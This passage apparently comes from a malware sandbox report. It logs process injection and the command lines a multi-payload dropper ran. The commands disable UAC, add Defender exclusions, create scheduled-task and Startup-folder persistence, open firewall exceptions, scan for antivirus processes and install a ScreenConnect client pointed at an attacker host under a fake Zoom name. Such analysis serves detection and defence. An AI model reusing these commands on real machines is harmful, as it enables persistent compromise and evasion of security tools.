PID 3676 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe C:\Windows\SysWOW64\msiexec.exe
PID 1900 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe
PID 1900 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe
PID 1900 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe
PID 4136 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe C:\Windows\SysWOW64\cmd.exe
PID 4136 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe C:\Windows\SysWOW64\cmd.exe
PID 4136 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe C:\Windows\SysWOW64\cmd.exe
PID 1900 wrote to memory of 4232 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Windows\system32\svchost.exe
PID 1900 wrote to memory of 4232 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Windows\system32\svchost.exe
PID 1900 wrote to memory of 4232 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Windows\system32\svchost.exe
PID 1828 wrote to memory of 3184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1828 wrote to memory of 3184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1828 wrote to memory of 3184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4136 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe C:\Windows\SysWOW64\WScript.exe
PID 4136 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe C:\Windows\SysWOW64\WScript.exe
PID 4136 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe C:\Windows\SysWOW64\WScript.exe
PID 5052 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Windows\system32\Windows Shell Interactive.exe
PID 5052 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Windows\system32\Windows Shell Interactive.exe
PID 5052 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Windows\system32\Windows Shell Interactive.exe
PID 2392 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe
PID 2392 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe
PID 2392 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe
PID 1900 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\T.exe
PID 1900 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\T.exe
PID 1900 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\Users\Admin\AppData\Local\Temp\a\T.exe
PID 4572 wrote to memory of 4496 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4572 wrote to memory of 4496 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4572 wrote to memory of 4496 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2436 wrote to memory of 4920 N/A C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe
PID 2436 wrote to memory of 4920 N/A C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe
PID 2436 wrote to memory of 4920 N/A C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe
PID 5052 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Windows\TEMP\{0AEA5278-E430-43C6-AEB6-A6CB16805C3E}\.cr\QGFQTHIU.exe
PID 5052 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Windows\TEMP\{0AEA5278-E430-43C6-AEB6-A6CB16805C3E}\.cr\QGFQTHIU.exe
PID 5052 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe C:\Windows\TEMP\{0AEA5278-E430-43C6-AEB6-A6CB16805C3E}\.cr\QGFQTHIU.exe
PID 4496 wrote to memory of 4480 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\rundll32.exe
PID 4496 wrote to memory of 4480 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\rundll32.exe
PID 4496 wrote to memory of 4480 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe

"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"

C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe

"C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"

C:\ProgramData\Synaptics\Synaptics.exe

"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate

C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe

"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate

C:\Users\Admin\AppData\Local\Temp\a\1.exe

"C:\Users\Admin\AppData\Local\Temp\a\1.exe"

C:\Users\Admin\AppData\Local\Temp\a\test.exe

"C:\Users\Admin\AppData\Local\Temp\a\test.exe"

C:\Users\Admin\AppData\Local\Temp\a\Update.exe

"C:\Users\Admin\AppData\Local\Temp\a\Update.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Universities Universities.cmd & Universities.cmd

C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe

"C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe"

C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe

"C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\0cef7d10d8f459fc\ScreenConnect.ClientSetup.msi"

C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe

"C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Users\Admin\AppData\Local\Temp\a\windows.exe

"C:\Users\Admin\AppData\Local\Temp\a\windows.exe"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"

C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe

"C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe"

C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe

"C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe" -burn.filehandle.attached=688 -burn.filehandle.self=540

C:\Users\Admin\AppData\Local\Temp\a\T.exe

"C:\Users\Admin\AppData\Local\Temp\a\T.exe"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 1347DC49D48561C4A02CAEABAB78B4B1 C

C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe

C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe

C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe

"C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe"

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIC10E.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240632515 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe

C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Bitdefender\$77-Bitdefender.exe"

C:\Users\Admin\AppData\Local\Temp\a\access.exe

"C:\Users\Admin\AppData\Local\Temp\a\access.exe"

C:\ProgramData\Bitdefender\$77-Bitdefender.exe

C:\ProgramData\Bitdefender\$77-Bitdefender.exe

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

\??\c:\program files (x86)\internet explorer\iexplore.exe

"c:\program files (x86)\internet explorer\iexplore.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "opssvc wrsa"

C:\Users\Admin\AppData\Local\Temp\a\36.exe

"C:\Users\Admin\AppData\Local\Temp\a\36.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4552 -ip 4552

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 364

C:\Users\Admin\AppData\Local\Temp\a\99999.exe

"C:\Users\Admin\AppData\Local\Temp\a\99999.exe"

C:\Users\Admin\AppData\Local\Temp\a\22.exe

"C:\Users\Admin\AppData\Local\Temp\a\22.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD1C7.tmp.bat""

C:\Users\Admin\AppData\Roaming\server.exe

"C:\Users\Admin\AppData\Roaming\server.exe"

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe

"C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe"

C:\Users\Admin\AppData\Local\Temp\a\Network.exe

"C:\Users\Admin\AppData\Local\Temp\a\Network.exe"

C:\Users\Admin\AppData\Roaming\system.exe

"C:\Users\Admin\AppData\Roaming\system.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\a\rea.exe

"C:\Users\Admin\AppData\Local\Temp\a\rea.exe"

\??\c:\program files (x86)\internet explorer\iexplore.exe

"c:\program files (x86)\internet explorer\iexplore.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe

"C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\T.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe' -Force

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /f /tn "SCSI Monitor" /xml "C:\Users\Admin\AppData\Local\Temp\tmpEF71.tmp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe' -Force

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /f /tn "SCSI Monitor Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpF50F.tmp"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e6TONnwlRjZT.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Network.exe'

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Network.exe'

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 812A33CB12312E6462786B39941DA2A5

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 8849EAC97ADA90BEB9C92DE240009D0C E Global\MSI0000

C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe

"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mail.mindfulinvoice.online&p=8041&s=a205822a-25dd-4182-ae48-34f1f8dfcbcd&k=BgIAAACkAABSU0ExAAgAAAEAAQBBzfcAyYpoA9s86t45oTU7RBr4d3j4wo7ZWaxqW1gXVfaaoS%2bfd0k%2bPJKuwjzsEUcR0STNhshdEUFtsJUgTCaM2RxVswQODfRB%2fxy8spQ2LWWZZewzTdxJbjosBiXV2QpUCcfCmF5yx2%2fO4iVCF7r%2bUlzDG93NmkPtCrZC9yxqlnxALMX%2bF%2faXCCBkyDmMu3o22AbtP3XzZdSzxk8RbscXClS7evLV%2bxau13F1YFn%2baxZ7QaXuHbPv1tE2Bs26tkj%2fE18oOxpgof0OaK2Jy%2bP9WIy8ymeDPQIfocdTFuAek5wZ3lNpFAcbox7NXzIde9yf0dLrOLPA36Dg%2fHz05hjY&c=zoom&c=zoom-invite.com&c=&c=&c=&c=&c=&c="

C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe

"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe" "RunRole" "791a6c20-0820-417e-b3aa-8d215157e49c" "User"

C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe

"C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Network.exe'

C:\Users\Admin\AppData\Local\Temp\a\mod.exe

"C:\Users\Admin\AppData\Local\Temp\a\mod.exe"

C:\Users\Admin\AppData\Local\Temp\a\Server.exe

"C:\Users\Admin\AppData\Local\Temp\a\Server.exe"

C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe

"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe" "RunRole" "d3f4f0ef-3603-4e14-afcf-b85b775e7c43" "System"

C:\Users\Admin\AppData\Local\Temp\a\Client.exe

"C:\Users\Admin\AppData\Local\Temp\a\Client.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Users\Admin\AppData\Local\Temp\a\jij.exe

"C:\Users\Admin\AppData\Local\Temp\a\jij.exe"

C:\Users\Admin\AppData\Local\Temp\a\333.exe

"C:\Users\Admin\AppData\Local\Temp\a\333.exe"

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SdKVUC2UF3Oy.bat" "

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xnAULEnVoqrp.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Network" /tr "C:\Users\Admin\AppData\Roaming\Network.exe"

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Users\Admin\AppData\Roaming\Network.exe

C:\Users\Admin\AppData\Roaming\Network.exe

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vaS5Lj59HSh3.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9PZb2XeKo2Ov.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UvCM9DTMx1PL.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NHugTaed4e2t.bat" "

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe

"C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe"

C:\Windows\TEMP\{0AEA5278-E430-43C6-AEB6-A6CB16805C3E}\.cr\QGFQTHIU.exe

"C:\Windows\TEMP\{0AEA5278-E430-43C6-AEB6-A6CB16805C3E}\.cr\QGFQTHIU.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe" -burn.filehandle.attached=648 -burn.filehandle.self=652

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hhjzBeMnS37F.bat" "

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Windows\TEMP\{68F3F38E-816C-4A8A-9520-9E1A6A21E496}\.ba\msn.exe

C:\Windows\TEMP\{68F3F38E-816C-4A8A-9520-9E1A6A21E496}\.ba\msn.exe

C:\Users\Admin\AppData\Roaming\serviceTlsv3_x86\msn.exe

C:\Users\Admin\AppData\Roaming\serviceTlsv3_x86\msn.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZDT8T7iTruRo.bat" "

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\plRuUThQ7DUV.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Xxys2Xb0KHAy.bat" "

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\cmd.exe

cmd /c md 634977

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\SysWOW64\extrac32.exe

extrac32 /Y /E Gtk

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8CcSCQtjZT2g.bat" "

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Y0xNmMCFk8yV.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

